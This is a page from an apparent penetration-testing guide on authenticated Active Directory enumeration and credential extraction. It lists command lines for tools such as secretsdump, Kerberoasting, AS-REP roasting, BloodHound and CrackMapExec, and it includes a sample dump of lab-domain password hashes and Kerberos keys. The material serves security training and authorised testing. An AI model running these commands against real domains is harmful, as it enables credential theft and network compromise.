This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Authenticated (Post-Compromise) Enumeration

Domain Mapping

Purpose: Extract AD objects and relationships for attack planning.

LDAP Domain Dump

Requirements: Valid domain credentials (user account)

Use Case: Post-credential compromise, domain mapping for attack planning

# Complete authenticated domain extraction
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP>

# Alternative authentication method
ldapdomaindump --hashes :<NTLM-hash> -u '<username>' -d <domain.com> <DC-IP>

Credential Extraction

Purpose: Harvest authentication material for lateral movement and privilege escalation.

Requirements: Administrative privileges on target system or DCSync rights for domain controllers

Use Case: When you have admin access to systems or specific privileges like "Replicating Directory Changes"

NTDS.dit and Registry Hive Extraction

# Complete credential dump from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP>
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP>

Example output:

Impacket v0.13.0.dev0+20250728.93925.b5302a84 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xd01d352a7b37e42791250a0ec4c4baa3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HACKME\WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
HACKME\WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
HACKME\WIN-R0BUVKRGBID$:des-cbc-md5:0eba0273bad6cddc
HACKME\WIN-R0BUVKRGBID$:plain_password_hex:13e281e55dc8d980092c231b7fee2200cfded5eb024fa4d177ee6c1c0e428bee9ae2797e50cf651bdde3002cd487f660672ea5118c4409593e9c4b1b8e1256b14b2bf9be84a84bfc54b72a1aaa2fff6f90b20d5374f770f7b43e57964c7730ce154bcc291fb9a5da7f5aace24a64aa0a43499b6ab06cf71442b2be0e5ca68d50b647edb16736034e46efde3e5b2126613912c08068525f59778a2a531464347a56d2fa055bd9d1740f13a4522848f6d94d59721c0e7fae6a7e6597066b00cb52407f3555ebb9154a0415a30a377dbc2fdf4e22f5a7104aed183e71954339d61224cfa598935ae952cf3660eac4116d0f
HACKME\WIN-R0BUVKRGBID$:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe5639817fd3ce0a5fc8d379c16f99fa6c830b85a
dpapi_userkey:0x5c8986c14d00d9457788fb334fc2a92d4d7acbc2
[*] NL$KM 
 0000   DD D5 F3 D0 EA 3E 3F 1B  34 70 72 E6 34 9B 62 78   .....>?.4pr.4.bx
 0010   CF 54 72 CA F4 86 45 A4  0A D0 DF 3F 2B 1E 2E E9   .Tr...E....?+...
 0020   33 65 9A 31 59 2A 57 27  7D 37 E7 ED 5C 6C 28 11   3e.1Y*W'}7..\l(.
 0030   24 92 C6 99 1B 0C 85 2F  70 9B 48 A2 8B 39 EA DF   $....../p.H..9..
NL$KM:ddd5f3d0ea3e3f1b347072e6349b6278cf5472caf48645a40ad0df3f2b1e2ee933659a31592a57277d37e7ed5c6c28112492c6991b0c852f709b48a28b39eadf
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:241ebf5d671f670e63a3a12fd332fd1a:::
hackme.local\sql-svc:1103:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
hackme.local\7amoodeh:1104:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
hackme.local\ra2fat:1105:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
WIN-R0BUVKRGBID$:1000:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
DESKTOP-4CJ1O3A$:1106:aad3b435b51404eeaad3b435b51404ee:fa92e5f8eb7ace3562e5711a869ffc59:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:eda01d9820ff8288900a83674eec768856d66f53ac19b244c9208376ebe5c484
Administrator:aes128-cts-hmac-sha1-96:48c2d624819f9c36281ff52aed35ce32
Administrator:des-cbc-md5:45838a9468a7d626
krbtgt:aes256-cts-hmac-sha1-96:2263f262b93c5c4969e7c1409ff6474a23bd3d1462a94a3b6cac52cd61e5a9d0
krbtgt:aes128-cts-hmac-sha1-96:c0dcf5e606ea8bb22f0608289ccab1bd
krbtgt:des-cbc-md5:9d6eb58fd9e6a208
hackme.local\sql-svc:aes256-cts-hmac-sha1-96:2c54eafc466fbd3f2d4d205b823b4784a00cb9e05d5922de9351c7b51fd198e9
hackme.local\sql-svc:aes128-cts-hmac-sha1-96:630dca436f714c2fe0522b226405fdc5
hackme.local\sql-svc:des-cbc-md5:5b9b342f459868c1
hackme.local\7amoodeh:aes256-cts-hmac-sha1-96:bab49f211d57e7fe609012db29f9f4b61f22bf5029716c888bd8ac7c8a527e6e
hackme.local\7amoodeh:aes128-cts-hmac-sha1-96:19318dc18b9d36107c346e339b7407d5
hackme.local\7amoodeh:des-cbc-md5:62c723379bfbaedc
hackme.local\ra2fat:aes256-cts-hmac-sha1-96:da91b33ef480372970d1260fb28adfba8a9e90a3aa7546bf16c8b8c86ae46554
hackme.local\ra2fat:aes128-cts-hmac-sha1-96:4bf2db5302b776eaa25e08af4debcbaf
hackme.local\ra2fat:des-cbc-md5:91fb8cf19ba8868f
WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
WIN-R0BUVKRGBID$:des-cbc-md5:23465825ae6b383b
DESKTOP-4CJ1O3A$:aes256-cts-hmac-sha1-96:a558cfe8d560b89df823e1319a6f0554641f084e69ca4e82d742130fee58c4e9
DESKTOP-4CJ1O3A$:aes128-cts-hmac-sha1-96:1ecca604d68ae2a7478b1161d158daef
DESKTOP-4CJ1O3A$:des-cbc-md5:311adab07a326197
[*] Cleaning up...

Service Account Discovery

Purpose: Identify service accounts for Kerberoasting and AS-REP roasting attacks.

Kerberoasting Enumeration

Requirements: Valid domain user credentials (any user can perform Kerberoasting)

Use Case: Always applicable with domain credentials - service accounts are common targets

# SPN enumeration
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP>

Example output:

AS-REP Roasting

Requirements: Domain user credentials or list of usernames for unauthenticated attempts

Use Case: When accounts have "Do not require Kerberos preauthentication" enabled

# Find accounts without pre-authentication
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass

Privilege Escalation Path Discovery

Purpose: Map AD relationships for privilege escalation opportunities.

BloodHound Data Collection

For this, you need a specialized viewer (BloodHound) for the data and a graph database (Neo4j).

Installation details can be found in Attacking Active Directory (Important!)

Requirements: Domain user credentials, network access to domain controllers and targets

Use Case: Mapping complex privilege relationships, planning privilege escalation paths

# Comprehensive collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all --zip
bloodhound-python --hashes :<NTLM-hash> -u <username> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all

Multi-Protocol Information Gathering

Purpose: Leverage multiple protocols for comprehensive enumeration.

CrackMapExec Enumeration

# SMB-based enumeration
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --sessions
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --disks

# LDAP-based enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --admin-count
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --trusted-for-delegation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --password-not-required

# Advanced LDAP queries
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --gmsa

# Network-wide enumeration
crackmapexec smb 192.168.1.0/24 -u '<username>' -p '<password>' --shares
crackmapexec ldap 192.168.1.0/24 -u '<username>' -p '<password>' --users

Requirements: Valid domain credentials, network access to targets

Use Case: Network-wide enumeration, multi-protocol correlation, bulk operations

Password Policy and Account Lockout Analysis

# Extract password policies
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --pass-pol

# Fine-grained password policy enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --fgpp

Requirements: Domain user credentials

Use Case: Planning password attacks, understanding lockout thresholds

Security Identifier (SID) Analysis

Purpose: Enumerate objects through SID bruteforcing.

Comprehensive SID Enumeration

# Basic SID enumeration
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP>
python3 lookupsid.py guest@<DC-IP>

# Custom SID ranges
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 500-2000
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 1000-5000

# Maximum SID discovery
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> | tail -1

Requirements: Valid credentials or guest access, RPC access to domain controllers

Use Case: Discovering hidden accounts, service accounts, and non-standard objects

Advanced LDAP Enumeration

Purpose: Perform targeted queries for specific attack vectors.

Windapsearch Enumeration

# Basic enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password>

# Privileged user discovery
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --da
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users

# Delegation enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-users
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --constrained-users

# Computer enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --dc

# Custom LDAP queries
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=user)(servicePrincipalName=*))"
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=computer)(operatingSystem=*Server*))"

Requirements: Domain user credentials, LDAP access to domain controllers

Use Case: Targeted enumeration for specific attack vectors, custom queries

Trust Relationship Analysis

Purpose: Map trust relationships for cross-domain attacks.

Trust Enumeration

# Basic trust discovery
python3 getTrusts.py <domain>/<username>:<password> -dc-ip <DC-IP>

# Cross-domain enumeration
for domain in $(cat trusted_domains.txt); do
    echo "Enumerating $domain"
    python3 GetADUsers.py $domain/<username>:<password> -all -dc-ip <DC-IP>
    python3 GetUserSPNs.py $domain/<username>:<password> -dc-ip <DC-IP>
done

# Trust-specific BloodHound collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts

Requirements: Domain user credentials, network access to trusted domains

Use Case: Multi-domain environments with established trust relationships

PreviousNon-Authenticated (External) EnumerationNextAuthentication Attacks

Last updated

Was this helpful?